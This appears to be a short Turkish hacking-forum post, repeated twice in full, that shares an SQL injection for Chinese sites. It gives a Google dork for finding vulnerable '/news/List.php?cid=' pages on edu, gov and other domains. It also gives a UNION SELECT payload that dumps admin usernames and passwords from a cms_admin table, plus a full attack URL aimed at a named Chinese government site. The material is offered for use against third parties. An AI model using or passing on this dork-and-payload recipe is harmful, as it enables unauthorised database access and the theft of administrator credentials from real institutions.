S.a arkadaşlar
Sizinle çin sitelerinde bulunan bir SQL injection
Google Dork:
inurl:"/news/List.php?cid=" "edu"
gov,edu,net,info v.s Şeklinde genişletilebilir.
Exploit ;
/news/List.php?cid=-65+union+select+concat(username,0x3a,password),2+f rom+cms_admin+limit+0,1--
Örnek site arkadaşlar
http://www.shuangliu.gov.cn/news/List.php?cid=-65+union+select+concat%28username,0x3a,password%29,2+from+cms_admin+limit+0,1--
(örnek site açığı kapanmıs arkadaslar)
Umarım İşinizi Yarar.
Selametle.
Sizinle çin sitelerinde bulunan bir SQL injection
Google Dork:
inurl:"/news/List.php?cid=" "edu"
gov,edu,net,info v.s Şeklinde genişletilebilir.
Exploit ;
/news/List.php?cid=-65+union+select+concat(username,0x3a,password),2+f rom+cms_admin+limit+0,1--
Örnek site arkadaşlar
http://www.shuangliu.gov.cn/news/List.php?cid=-65+union+select+concat%28username,0x3a,password%29,2+from+cms_admin+limit+0,1--
(örnek site açığı kapanmıs arkadaslar)
Umarım İşinizi Yarar.
Selametle.